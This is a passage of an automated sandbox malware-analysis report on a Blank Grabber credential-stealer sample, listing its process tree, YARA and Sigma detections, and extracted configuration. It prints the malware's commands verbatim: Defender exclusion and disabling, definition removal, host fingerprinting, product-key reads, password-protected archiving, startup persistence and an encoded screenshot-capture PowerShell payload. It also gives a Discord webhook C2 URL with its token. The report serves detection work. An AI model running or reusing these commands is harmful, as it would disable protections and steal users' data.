      • cmd.exe (PID: 8172 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8644 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4864 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7628 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8596 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8736 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8668 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8920 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8904 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7456 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 8 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", ProcessId: 7708, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7716, ProcessName: cmd.exe
              Sigma detected: Rar Usage with Password and Compression Level
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *", ProcessId: 4536, ProcessName: cmd.exe
              Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 8920, StartAddress: 68232B0, TargetImage: C:\Windows\System32\tree.com, TargetProcessId: 8920
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Startup Folder Persistence
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessId: 7656, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAA